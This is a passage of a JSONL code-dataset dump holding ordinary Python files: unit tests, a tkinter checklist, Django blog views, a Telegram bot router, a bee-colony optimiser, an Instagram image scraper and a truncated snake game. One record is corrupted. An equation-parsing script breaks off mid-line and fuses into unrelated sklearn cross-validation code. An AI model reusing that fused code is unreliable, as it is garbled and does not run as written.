= metrics.roc_auc_score(y_test1, prob[:, -1])\n            f = open(os.path.join(out_dir, \"test_auc.csv\"), 'a')\n            f.write(\"%d,%.6f\\n\" % (ii, thresholds))\n            f.close()\n\n\n            for act in pretransform_test:\n                print(act)\n\n\n    tf.reset_default_graph()\n\n\nif __name__ == \"__main__\":\n    for ii in range(5):\n        main(ii)","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"203163225","text":"import pangram\r\nimport unittest\r\n\r\n\r\nclass TestPG(unittest.TestCase):\r\n\r\n    def test_quick_brown_fox_jumped_over_the_fence_as_TRUE(self):\r\n        pc = pangram.Checker()\r\n        sentence = \"A quick brown fox jumps over the lazy dog.\"\r\n        self.assertEqual(True, pc.test(sentence))\r\n\r\n    def test_quick_brown_fox_jumped_over_the_fence_as_FALSE(self):\r\n        pc = pangram.Checker()\r\n        sentence = \"A quick brown fox jumps over the dog.\"\r\n        self.assertEqual(False, pc.test(sentence))\r\n\r\n    def test_from_pangrams_list(self):\r\n        #\r\n        # from http://clagnut.com/blog/2380/\r\n        #\r\n        sentence = \"Sympathizing would fix Quaker objectives.\"\r\n        pc = pangram.Checker()\r\n        self.assertEqual(True, pc.test(sentence))\r\n\r\n\r\nif __name__ == '__main__':\r\n    unittest.main()\r\n","sub_path":"pangram/test_pangram.py","file_name":"test_pangram.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"578834371","text":"import element.node\n\nclass ActionView(object):\n    def __init__(self, rendered, event_dispatcher):\n        self.rendered = rendered\n        self.event_dispatcher = event_dispatcher\n\n    def dispatch(self, request_handler, *args, **kwargs):\n        if '_controller' not in kwargs:\n            return\n\n        serviceId, method = kwargs['_controller'].split(\":\")\n\n        del kwargs['_controller']\n\n        parameters = request_handler.request.query_arguments.copy()\n        parameters.update(kwargs)\n\n        node = element.node.Node('action://%s' % serviceId, {\n            'type': 'action.node',\n            'serviceId': serviceId,\n            'method': method,\n            'kwargs': parameters,\n            'request': request_handler.request\n        })\n\n        event = self.event_dispatcher.dispatch('element.node.load.success', {\n            'node': node\n        })\n\n        return self.rendered.render(request_handler, event.get('node'))\n","sub_path":"element/plugins/action/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"640177721","text":"import tkinter as tk\r\nfrom tkinter import *\r\nimport os\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Checklist\")\r\nitems = []\r\n\r\ncanvas = tk.Canvas(root, height=800, width=700, bg=\"#C0C0C0\")\r\ncanvas.pack()\r\n\r\nframe = tk.Frame(root, bg=\"white\")\r\nframe.place(relwidth=0.8, relheight = 0.8, relx=0.1, rely=0.1)\r\n\r\n\r\nif os.path.isfile('list.txt'):\r\n    with open('list.txt', 'r') as f :\r\n        temp = f.read()\r\n        print(temp)\r\n        temp = temp.split(\",\")\r\n        items = [x for x in temp if x.strip()]\r\n        for i in range (0,len(items)):\r\n            label = tk.Label(frame, text=items[i], bg=\"#C0C0C0\")\r\n            label.pack()\r\n\r\ndef getEntry():\r\n    item = e.get()\r\n    item = str(item)\r\n    if item in items:\r\n        global temporaryItem\r\n        temporaryItem = item\r\n        items.remove(item)\r\n    else:\r\n        items.append(item)\r\n    print (items)\r\n    for widget in frame.winfo_children():\r\n        widget.destroy()\r\n    for i in range (0,len(items)):\r\n        label = tk.Label(frame, text=items[i], bg=\"#C0C0C0\")\r\n        label.pack()\r\n\r\ndef undoTask():\r\n    items.append(temporaryItem)\r\n    for widget in frame.winfo_children():\r\n        widget.destroy()\r\n    for i in range (0,len(items)):\r\n        label = tk.Label(frame, text=items[i], bg=\"#C0C0C0\")\r\n        label.pack()\r\n\r\ne = tk.Entry(root, width=50)\r\ne.pack()\r\n\r\nadd = tk.Button(root, text=\"Click\", padx=10, pady=5, fg=\"white\", bg=\"#C0C0C0\", font=('helvetica',9), command=getEntry)\r\nadd.pack()\r\n\r\nundo = tk.Button(root, text=\"Undo\", padx=10, pady=5, fg=\"white\", bg=\"#C0C0C0\", command=undoTask)\r\nundo.pack()\r\n\r\nroot.mainloop()\r\n\r\nwith open('list.txt', 'w') as f:\r\n    for item in items:\r\n        f.write(item + ',')","sub_path":"List Keeper.py","file_name":"List Keeper.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"308555600","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport codecs\nimport icu\n\nfrom cldr_util import makePhonemeSet, match, check, regtest\n\nGRAPHEMES = icu.UnicodeSet()\nGRAPHEMES.applyPattern('[[:Taml:] [:P:]]')\n\nPHONEMES = makePhonemeSet(\"\"\"\n\n    m n ɲ ɳ ŋ\n    p b tʳ t̪ d̪ ʈ ɖ k ɡ\n    f s ʂ sʼ ʃ h x\n    ʋ r ɻ l ɭ j\n\n    t͡ʃ d͡ʒ\n\n    i iː u uː\n    e eː o oː\n    a aː\n\n    aɪ̯ aʊ̯\n\n\n\"\"\")\n\ncheck('ta-fonipa-t-ta', GRAPHEMES, PHONEMES)\nregtest('ta-fonipa-t-ta', GRAPHEMES, PHONEMES)\n","sub_path":"cldr/check_translit_ta.py","file_name":"check_translit_ta.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"179986937","text":"source=input().split(\"=\")\nleft=list(source[0])\nright=list(source[1])\nlefts=[]\nrights=[]\nleft_a=0\nleft_start=0\nright_a=0\nrigth_start=0\nwhile(left_a= 3):\n            predict_y.append(x[index]['vol_number'])\n            word_index.append(index)\n        elif (penult(w) == True):\n            if (x[i]['vol_number'] >= 3):\n                predict_y.append(x[index]['vol_number'] - 1)\n                word_index.append(index)\n\n        elif (antepenultimate(w) == True):\n            if (x[i]['vol_number'] >= 3):\n                predict_y.append(x[index]['vol_number'] - 2)\n                word_index.append(index)\n        elif (firstSyll(w) == True):\n            predict_y.append(1)\n            word_index.append(index)\n\n        index += 1\n\n    return predict_y, word_index\n\ndef cv_loop(model, name):\n    data = preprocess.readplz()\n    x, y=preprocess.get(data)\n    SPLITS = 100\n    kf = KFold(n_splits=SPLITS)\n    all_score = 0\n\n    avg_train_f1score=0\n    avg_test_f1score=0\n\n    for train,test in kf.split(x):\n        x_train,x_test,y_train,y_test = x[train],x[test],y[train],y[test]\n\n        model.fit(x_train,y_train)\n        predict_y = model.predict(x_test)  # model predictions; type is numpy.ndarray\n\n        data_test = data[test[0]:test[-1]+1]  # test-set data used for rule-based prediction\n        word_list = depart(data_test)  # words in the test set\n\n        mid = list(map(extract_changed.extract_train, data[test[0]:test[-1]+1]))\n        feature, true_y = vectorizer.departit(mid)\n        t_predict_y, word_index = predict(feature, word_list)\n        # replace part of the model predictions with the rule-based results\n        i = 0\n        for index in word_index:\n            predict_y[index] = t_predict_y[i]\n            i += 1\n\n\n        # compute the score\n        t_score = f1_score(y_test,predict_y, average='weighted')\n        avg_test_f1score += t_score\n\n\n    print(name)\n    print(avg_test_f1score/SPLITS)\n\nif __name__ == '__main__':\n\n    models = [RandomForestClassifier(), ExtraTreesClassifier(), KNeighborsClassifier(),\n              DecisionTreeClassifier(), LogisticRegression(), SVC()]\n    model_names = ['RandomForestClassifier()', 'ExtraTreesClassifier()', 'KNeighborsClassifier()',\n                   'DecisionTreeClassifier()', 'LogisticRegression()', 'SVC()']\n\n    for i in range(len(models)):\n        cv_loop(models[i], model_names[i])\n\n\n","sub_path":"2017年大数据处理与挖掘(暑期课程)/code/pkg/cv_ex_rule.py","file_name":"cv_ex_rule.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"387373692","text":"\nimport wolfpack\nfrom wolfpack import console\nfrom wolfpack.consts import *\n\n#\n# Add multiple instances of items based on tags\n# defined for the item on creation.\n#\ndef onAttach(object):\n\tif not object.isitem():\n\t\treturn\n\n\tif not object.hastag('itemdef'):\n\t\tconsole.log(LOG_ERROR, \"Missing itemdef tag for multibag object.\\n\")\n\t\treturn\n\n\tif not object.hastag('itemamount'):\n\t\tconsole.log(LOG_ERROR, \"Missing itemamount tag for multibag object.\\n\")\n\t\treturn\n\n\tid = str(object.gettag('itemdef'))\n\tamount = int(object.gettag('itemamount'))\n\n\tfor i in range(0, amount):\n\t\titem = wolfpack.additem(id)\n\t\titem.container = object\n\n\tobject.deltag('itemdef')\n\tobject.deltag('itemamount')\n\tobject.removescript('testing.multibag')\n","sub_path":"tags/Release_12_9_9/server/release/scripts/testing/multibag.py","file_name":"multibag.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"270483390","text":"# Copyright (C) 2020 Intel Corporation\n#\n# SPDX-License-Identifier: MIT\n\nfrom collections import OrderedDict, defaultdict\nfrom typing import Iterable, Union, Dict, List\n\nfrom datumaro.components.extractor import (Extractor, LabelCategories,\n    AnnotationType, DatasetItem, DEFAULT_SUBSET_NAME)\nfrom datumaro.components.dataset_filter import \\\n    XPathDatasetFilter, XPathAnnotationsFilter\n\n\nclass Dataset(Extractor):\n    class Subset(Extractor):\n        def __init__(self, parent):\n            self.parent = parent\n            self.items = OrderedDict()\n\n        def __iter__(self):\n            yield from self.items.values()\n\n        def __len__(self):\n            return len(self.items)\n\n        def categories(self):\n            return self.parent.categories()\n\n    @classmethod\n    def from_iterable(cls, iterable: Iterable[DatasetItem],\n            categories: Union[Dict, List[str]] = None):\n        if isinstance(categories, list):\n            categories = { AnnotationType.label:\n                LabelCategories.from_iterable(categories)\n            }\n\n        if not categories:\n            categories = {}\n\n        class _extractor(Extractor):\n            def __iter__(self):\n                return iter(iterable)\n\n            def categories(self):\n                return categories\n\n        return cls.from_extractors(_extractor())\n\n    @classmethod\n    def from_extractors(cls, *sources):\n        categories = cls._merge_categories(s.categories() for s in sources)\n        dataset = Dataset(categories=categories)\n\n        # merge items\n        subsets = defaultdict(lambda: cls.Subset(dataset))\n        for source in sources:\n            for item in source:\n                existing_item = subsets[item.subset].items.get(item.id)\n                if existing_item is not None:\n                    path = existing_item.path\n                    if item.path != path:\n                        path = None\n                    item = cls._merge_items(existing_item, item, path=path)\n\n                subsets[item.subset].items[item.id] = item\n\n        dataset._subsets = dict(subsets)\n        return dataset\n\n    def __init__(self, categories=None):\n        super().__init__()\n\n        self._subsets = {}\n\n        if not categories:\n            categories = {}\n        self._categories = categories\n\n    def __iter__(self):\n        for subset in self._subsets.values():\n            for item in subset:\n                yield item\n\n    def __len__(self):\n        if self._length is None:\n            self._length = sum(len(s) for s in self._subsets.values())\n        return self._length\n\n    def get_subset(self, name):\n        return self._subsets[name]\n\n    def subsets(self):\n        return self._subsets\n\n    def categories(self):\n        return self._categories\n\n    def get(self, item_id, subset=None, path=None):\n        if path:\n            raise KeyError(\"Requested dataset item path is not found\")\n        item_id = str(item_id)\n        subset = subset or DEFAULT_SUBSET_NAME\n        subset = self._subsets[subset]\n        return subset.items[item_id]\n\n    def put(self, item, item_id=None, subset=None, path=None):\n        if path:\n            raise KeyError(\"Requested dataset item path is not found\")\n\n        if item_id is None:\n            item_id = item.id\n        if subset is None:\n            subset = item.subset\n\n        item = item.wrap(id=item_id, subset=subset, path=None)\n        if subset not in self._subsets:\n            self._subsets[subset] = self.Subset(self)\n        self._subsets[subset].items[item_id] = item\n        self._length = None\n\n        return item\n\n    def filter(self, expr, filter_annotations=False, remove_empty=False):\n        if filter_annotations:\n            return self.transform(XPathAnnotationsFilter, expr, remove_empty)\n        else:\n            return self.transform(XPathDatasetFilter, expr)\n\n    def update(self, items):\n        for item in items:\n            self.put(item)\n        return self\n\n    def define_categories(self, categories):\n        assert not self._categories\n        self._categories = categories\n\n    @staticmethod\n    def _lazy_image(item):\n        # NOTE: avoid https://docs.python.org/3/faq/programming.html#why-do-lambdas-defined-in-a-loop-with-different-values-all-return-the-same-result\n        return lambda: item.image\n\n    @classmethod\n    def _merge_items(cls, existing_item, current_item, path=None):\n        return existing_item.wrap(path=path,\n            image=cls._merge_images(existing_item, current_item),\n            annotations=cls._merge_anno(\n                existing_item.annotations, current_item.annotations))\n\n    @staticmethod\n    def _merge_images(existing_item, current_item):\n        image = None\n        if existing_item.has_image and current_item.has_image:\n            if existing_item.image.has_data:\n                image = existing_item.image\n            else:\n                image = current_item.image\n\n            if existing_item.image.path != current_item.image.path:\n                if not existing_item.image.path:\n                    image._path = current_item.image.path\n\n            if all([existing_item.image._size, current_item.image._size]):\n                assert existing_item.image._size == current_item.image._size, \"Image info differs for item '%s'\" % existing_item.id\n            elif existing_item.image._size:\n                image._size = existing_item.image._size\n            else:\n                image._size = current_item.image._size\n        elif existing_item.has_image:\n            image = existing_item.image\n        else:\n            image = current_item.image\n\n        return image\n\n    @staticmethod\n    def _merge_anno(a, b):\n        # TODO: implement properly with merging and annotations remapping\n        from .operations import merge_annotations_equal\n        return merge_annotations_equal(a, b)\n\n    @staticmethod\n    def _merge_categories(sources):\n        # TODO: implement properly with merging and annotations remapping\n        from .operations import merge_categories\n        return merge_categories(sources)","sub_path":"datumaro/components/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"21434838","text":"class Router:\n\n    def __init__(self, context):\n        self.handlers = list()\n        self.context = context\n\n    def handle(self, func, message=\"\", callback=\"\", command=\"\", step=\"\"):\n        handler = Handler(func, message=message, callback=callback, command=command, step=step)\n        self.handlers.append(handler)\n\n    def use_middleware(self, middleware):\n        if isinstance(middleware, list):\n            for mdw in middleware:\n                mdw(self.context)\n            return\n\n        middleware(self.context)\n\n    def route(self, context):\n        telegram_data = context.get(\"telegram\")\n        user = context.get('user')\n\n        print(\"+++++++++++++++++++++++++++++++++++++++++++\")\n        print(\"Message:\", telegram_data.message)\n        print(\"Callback:\", telegram_data.callback)\n\n        for handler in self.handlers:\n            # if handler is message type\n            if handler.event_type == 1:\n                if handler.step != \"\" and (handler.step == user.step):\n                    print(\"handler.step != '' and (handler.step == user.step)\")\n                    handler.handler(context)\n                    return\n\n                if telegram_data.message == \"\": continue\n                if handler.message == telegram_data.message:\n                    print(\"handler.message == telegram_data.message\")\n                    handler.handler(context)\n                    return\n\n            # if handler is callback type\n            if handler.event_type == 2:\n                if handler.callback == telegram_data.callback:\n                    print(\"handler.callback == telegram_data.callback\")\n                    handler.handler(context)\n                    return\n\n            # if handler is command type\n            if handler.event_type == 3:\n                if handler.command in telegram_data.message:\n                    print(\"handler.message in telegram_data.message\")\n                    print(\"Handler message:\", handler.message)\n                    print(\"Telegram message:\", telegram_data.message)\n\n                    print(handler.message in telegram_data.message)\n                    handler.handler(context)\n                    return\n\n\nclass Handler:\n    def __init__(self, handler, message=\"\", callback=\"\", command=\"\", step=\"\"):\n        if message or step:\n            self.event_type = 1\n        elif callback:\n            self.event_type = 2\n        elif command:\n            self.event_type = 3\n\n        self.handler = handler\n        self.message = message\n        self.callback = callback\n        self.step = step\n        self.command = command\n","sub_path":"router/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"555297320","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 17 16:49:54 2018\n\n@author: thieunv\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 17 01:36:18 2018\n\n@author: thieunv\n\n- Version 2: Code copied from the book: Clever Algorithms\n- Improves the create_neigh_bee part of version 1.\n- Much better results. Faster convergence\n\n300 epoch --> ver1: 0.8\n300 epoch --> ver2: 0.008\n\n\"\"\"\n\nfrom random import random, uniform, randint\nfrom copy import deepcopy\nfrom operator import itemgetter, add\n\n\ndef random_vector(minmax): # minmax: [ [-1, 1], [-1, 1], ... ]\n    x = []\n    for i in range(len(minmax)):\n        x.append((minmax[i][1] - minmax[i][0]) * random() + minmax[i][0])\n    return x\n\n\ndef create_random_bee(search_space):\n    return random_vector(search_space)\n\n\ndef objective_function(vector):\n    return reduce(add, (pow(x, 2.0) for x in vector), 0.0)\n\n\ndef create_neigh_bee_2(pop, individual, patch_size, search_space):\n    t1 = randint(0, len(individual)-1)\n    t2 = randint(0, len(pop)-1)\n\n    bee = deepcopy(individual)\n    bee[t1] = individual[t1] + uniform(-1, 1) * (individual[t1] - pop[t2][0][t1])\n\n    if bee[t1] < search_space[t1][0]:\n        bee[t1] = search_space[t1][0]\n    if bee[t1] > search_space[t1][1]:\n        bee[t1] = search_space[t1][1]\n    return bee\n\n\ndef create_neigh_bee(pop, individual, patch_size, search_space):\n    t1 = randint(0, len(individual)-1)\n\n    bee = deepcopy(individual)\n    if random() < 0.5:\n        bee[t1] = individual[t1] + random() * patch_size\n    else:\n        bee[t1] = individual[t1] - random() * patch_size\n\n    if bee[t1] < search_space[t1][0]:\n        bee[t1] = search_space[t1][0]\n    if bee[t1] > search_space[t1][1]:\n        bee[t1] = search_space[t1][1]\n    return bee\n\n\n\ndef search_neigh(pop, parent, neigh_size, patch_size, search_space): # parent: [ vector_individual, fitness ]\n    \"\"\"\n    Search among neigh_size neighbors, keep only the single best one\n    \"\"\"\n    neigh = [create_neigh_bee(pop, parent[0], patch_size, search_space) for x in range(0, neigh_size)]\n    neigh = [(bee, objective_function(bee)) for bee in neigh]\n    neigh_sorted = sorted(neigh, key=itemgetter(1))\n    return neigh_sorted[0]\n\n\ndef create_scout_bees(search_space, num_scouts): # number of scout bees\n    return [create_random_bee(search_space) for x in range(0, num_scouts)]\n\n\ndef search(max_gens, search_space, num_bees, num_sites, elite_sites, patch_size, e_bees, o_bees):\n    pop = [create_random_bee(search_space) for x in range(0, num_bees)]\n    for j in range(0, max_gens):\n        pop = [(bee, objective_function(bee)) for bee in pop]\n        pop_sorted = sorted(pop, key=itemgetter(1))\n        best = pop_sorted[0]\n\n        next_gen = []\n        for i in range(0, num_sites):\n            if i < elite_sites:\n                neigh_size = e_bees\n            else:\n                neigh_size = o_bees\n            next_gen.append(search_neigh(pop_sorted, pop_sorted[i], neigh_size, patch_size, search_space))\n\n        scouts = create_scout_bees(search_space, (num_bees - num_sites)) # scout bees\n        pop = [x[0] for x in next_gen] + scouts\n        patch_size = patch_size * 0.99\n        print(\"Epoch = {0}, patch_size = {1}, best = {2}\".format(j + 1, patch_size, best[1]))\n    return best\n\n\n\nif __name__ == \"__main__\":\n    # num_hidden_unit = 8\n    # num_output = 3\n    # problem_size = num_hidden_unit * num_output + num_output # weights hidden and bias output\n    problem_size = 24\n    search_space = [[-1, 1] for i in range(problem_size)]\n\n    max_gens = 280 # epoch\n    num_bees = 100 # number of bees - population\n    num_sites = 3 # partitioning, 3 sites\n    elite_sites = 1\n    patch_size = 3.0\n    e_bees = 10\n    o_bees = 3\n\n    best = search(max_gens, search_space, num_bees, num_sites, elite_sites, patch_size, e_bees, o_bees)\n    print(\"done! Solution: f = {0}, s = {1}\".format(best[1], best[0]))\n","sub_path":"do_an/old_result_my_neural/estimators/artificial_bee_colony_2.py","file_name":"artificial_bee_colony_2.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"89777349","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.context_processors import csrf\nfrom django.shortcuts import render_to_response, redirect\nfrom testblog.models import Comments, Posts\nfrom django.contrib import auth\nfrom django.contrib.auth.models import User \nfrom testblog.forms import UserLoginForm, RegisterForm, PostForm, CommentForm, ChangeProfile\nfrom django.views.generic.simple import direct_to_template\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.forms import forms\nfrom django.template import loader, Context \nfrom django.forms.models import inlineformset_factory\nfrom django.contrib.auth.views import login, logout\n\ndef main(request):\n    if not request.user.is_authenticated():\n        return HttpResponseRedirect('/')\n    post = Posts.objects.all().order_by('-date_post')\n    comment = Comments.objects.all()\n    return render_to_response('main.html', locals()) \n\ndef myposts(request, id):\n    post = Posts.objects.all()\n    return render_to_response('myposts.html', locals())\n\ndef profile(request):\n    if not request.user.is_authenticated():\n        return HttpResponseRedirect('/')\n    #user = User.objects.all()\n    #post = Posts.objects.filter(user_id = id)\n    return render_to_response('profile.html', locals())\n\ndef view_post(request, id):\n    if not request.user.is_authenticated():\n        return HttpResponseRedirect('/')\n    post1 = Posts.objects.get(id = id)\n    comment = Comments.objects.filter(post_id = id).order_by('-date_com')\n    form = CommentForm()\n    if request.method == 'POST':\n        user = request.user\n        u = Comments(user_id=user, post_id = post1)\n        form = CommentForm(request.POST, instance=u)\n        if form.is_valid():\n            form.save()\n            return HttpResponseRedirect(\"/main\")\n    return render_to_response('post1.html', locals())\n    \ndef login(request):\n    if request.method == 'POST':\n        username = request.POST['username']\n        password = request.POST['password']\n        user = auth.authenticate(username=username, password=password)\n        if user is not None and user.is_active:\n            auth.login(request, user)\n            return HttpResponseRedirect(\"/profile\")\n        else:\n            return HttpResponseRedirect(\"/\")\n    return render_to_response('login.html', locals())\n\ndef logout(request):\n    auth.logout(request)\n    return HttpResponseRedirect(\"/\")\n\ndef register(request):\n    form = RegisterForm()\n    if request.method == 'POST':\n        data = request.POST.copy()\n        form = RegisterForm(request.POST)\n        if form.is_valid():\n            form.save(data) \n            return HttpResponseRedirect(\"/\")\n    else:\n        form = RegisterForm()\n    return render_to_response(\"registration/register.html\", locals())\n\ndef addpost(request):\n    if not request.user.is_authenticated():\n        return HttpResponseRedirect('/')\n    form = PostForm()\n    if request.method == 'POST': \n        user = request.user\n        post = Posts(user_id=user)\n        form = PostForm(request.POST, instance=post)\n        if form.is_valid():\n            form.save() \n            return HttpResponseRedirect('/profile/%s/myposts' % request.user.id)\n    else:\n        form = PostForm()\n    return render_to_response(\"postadd.html\", locals())\n\ndef changeprofile(request):\n    if not request.user.is_authenticated():\n        return HttpResponseRedirect('/')\n    form = ChangeProfile()\n    if request.method == 'POST':\n        first_name = request.POST['first_name']\n        last_name = request.POST['last_name']\n        email = request.POST['email']\n        change = User.objects.filter(id = request.user.id).update(first_name=first_name, last_name=last_name, email=email)\n        return HttpResponseRedirect('/profile')\n    return render_to_response(\"changeprofile.html\", locals())\n","sub_path":"TestBlog/testblog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"599473550","text":"import argparse\nimport csv\nimport os\n\nimport requests\nfrom requests_html import HTMLSession\n\nsession = HTMLSession()\n\n\ndef scrape(tags, total_count):\n    for tag in tags:\n        try:\n            os.mkdir(tag)\n        except FileExistsError:\n            pass\n\n        url = 'https://www.instagram.com/explore/tags/' + tag\n        req = session.get(url)\n\n        count = 0\n        page = 0\n        with open(os.path.join(tag, 'data.csv'), 'w', newline='') as csvfile:\n            writer = csv.writer(csvfile, delimiter=',',\n                                quotechar='|', quoting=csv.QUOTE_MINIMAL)\n\n            while count <= total_count:\n                req.html.render(scrolldown=page)\n                images = req.html.xpath('//img[@alt]')\n                page += 1\n                for image in images:\n                    try:\n                        url, caption = image.attrs['src'], image.attrs['alt'].replace('\\n', '\\\\n')\n\n                        with open(os.path.join(tag, str(count) + '.jpg'), 'wb') as img:\n                            img.write(requests.get(url).content)\n\n                        writer.writerow([count, caption])\n                        print('[{}]'.format(tag), 'downloaded image ' + str(count), url)\n                        count += 1\n                        if count >= total_count:\n                            break\n                    except:\n                        print('!!one image failed!!')\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--tags', '-t', nargs='+',\n                        help='Tags to scrape images from')\n    parser.add_argument('--count', '-c', type=int,\n                        help='Total number of images to scrape for each given '\n                             'tag.')\n    args = parser.parse_args()\n    assert args.tags, \"Enter tags to scrape! Use --tags option, see help.\"\n    assert args.count, \"Enter total number of images to scrape using --count option, see help.\"\n    scrape(args.tags, args.count)\n","sub_path":"instagram_scrapper.py","file_name":"instagram_scrapper.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"343693477","text":"from rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom django.urls import reverse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponseRedirect\nfrom rest_framework.response import Response\nfrom django.contrib.auth.decorators import login_required\nfrom rest_framework.decorators import api_view\nfrom quickstart.models import UserDetails,UserGroup\nfrom quickstart.API.serializer import *\nfrom rest_framework.authentication import TokenAuthentication\nfrom django.contrib.auth import login as django_login, logout as django_logout\n\n@api_view(['GET'])\ndef get_user_details(request):\n    return Response(request)\n\n\n\n@login_required(login_url=\"/login\")\n@api_view(['POST'])\ndef addgroup(request):\n    context = {}\n    context['user'] = 'manish'\n    return Response(context['user'])\n\n@login_required(login_url=\"/login/\")\n@api_view(['POST'])\ndef logout_user(request):\n    logout(request)\n    return Response('Logout Successfully')\n\n\n@api_view(['POST'])\ndef add_user_details(request):\n    data=request.data\n    #return Response(data)\n    serializer = RegisterSerializer(data=data)\n    serializer.is_valid(raise_exception=True)\n    user = serializer.validated_data[\"user\"]\n    token, created = Token.objects.get_or_create(user=user)\n    return Response({\"token\": token.key}, status=200)\n\n\n@api_view(['POST'])\ndef login_user(request):\n    data=request.data\n    #return Response(data)\n    serializer = LoginSerializer(data=data)\n    serializer.is_valid(raise_exception=True)\n    user = serializer.validated_data[\"user\"]\n    django_login(request, user)\n    token, created = Token.objects.get_or_create(user=user)\n    return Response({\"token\": token.key}, status=200)\n    \n","sub_path":"quickstart/API/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"605401319","text":"# Slithering.py\r\n\r\nimport pygame\r\nimport sys\r\nimport time\r\nimport random\r\n\r\npygame.init()\r\n\r\n# Constants\r\nblack = (0, 0, 0)\r\nwhite = (255, 255, 255)\r\nred = (255, 0, 0)\r\nwindow_width = 800\r\nwindow_height = 600\r\n\r\n# setup environment\r\ngameDisplay = pygame.display.set_mode((window_width, window_height))\r\npygame.display.set_caption(\"Snekkz\")\r\nfont = pygame.font.SysFont(None, 25, 1)\r\n\r\n\r\ndef myquit():\r\n    pygame.quit()\r\n    sys.exit(0)\r\n\r\n\r\nclock = pygame.time.Clock()\r\nFPS = 5\r\nblockSize = 20\r\nnoPixel = 0\r\n\r\n\r\ndef snake(blockSize, snakeList):\r\n    for size in snakeList:\r\n        pygame.draw.rect(gameDisplay, black, [\r\n                         size[0]+5, size[1], blockSize, blockSize], 2)\r\n\r\n\r\ndef message(msg, color):\r\n    screen_text = font.render(msg, True, color)\r\n    gameDisplay.blit(screen_text, [window_width/2, window_height/2])\r\n\r\n\r\ndef gameloop():\r\n    gameExit = False\r\n    gameOver = False\r\n    lead_x = window_width/2\r\n    lead_y = window_height/2\r\n    del_x = 0\r\n    del_y = 0\r\n    snakeList = []\r\n    snakeLength = 1\r\n\r\n    randomAppleX = round(random.randrange(0, window_width-blockSize)/10.0)*10.0\r\n    randomAppleY = round(random.randrange(\r\n        0, window_height-blockSize)/10.0)*10.0\r\n\r\n# Game Loop\r\n\r\n    while not gameExit:\r\n\r\n        # If the game is over\r\n        while gameOver:\r\n            gameDisplay.fill(white)\r\n            message(\"Press return key to start or Esc to quit\", red)\r\n            pygame.display.update()\r\n\r\n            for event in pygame.event.get():\r\n                if(event.type == pygame.QUIT):\r\n                    gameOver = False\r\n                    gameExit = True\r\n                # Check for keypress\r\n                if(event.type == pygame.KEYDOWN):\r\n                    if (event.key == pygame.K_q):\r\n                        gameExit = True\r\n                        gameOver = False\r\n                    if(event.key == pygame.K_RETURN):\r\n                        gameloop()\r\n\r\n        # Otherwise\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                gameExit = True\r\n\r\n            if event.type == pygame.KEYDOWN:\r\n                if event.key == pygame.K_ESCAPE:\r\n                    myquit()\r\n                leftArrow = event.key == pygame.K_LEFT or event.key == pygame.K_a\r\n                rightArrow = event.key == pygame.K_RIGHT or event.key == pygame.K_d\r\n                upArrow = event.key == pygame.K_UP or event.key == pygame.K_w\r\n                downArrow = event.key == pygame.K_DOWN or event.key == pygame.K_s\r\n\r\n                if leftArrow:\r\n                    del_x = -blockSize\r\n                    del_y = noPixel\r\n                elif rightArrow:\r\n                    del_x = blockSize\r\n                    del_y = noPixel\r\n                elif upArrow:\r\n                    del_x = noPixel\r\n                    del_y = -blockSize\r\n                elif downArrow:\r\n                    del_x = noPixel\r\n                    del_y = blockSize\r\n\r\n        if lead_x < 0 or lead_x >= window_width or lead_y < 0 or lead_y >= window_height:\r\n            gameOver = True\r\n        lead_x += del_x\r\n        lead_y += del_y\r\n        gameDisplay.fill(white)\r\n\r\n        AppleThickness = 20\r\n        print([int(randomAppleX), int(randomAppleY),\r\n               AppleThickness, AppleThickness])\r\n        pygame.draw.rect(gameDisplay, red, [\r\n                         randomAppleX, randomAppleY, AppleThickness, AppleThickness])\r\n\r\n        allspritesList = []\r\n        allspritesList.append(lead_x)\r\n        allspritesList.append(lead_y)\r\n        snakeList.append(allspritesList)\r\n\r\n        if(len(snakeList) > 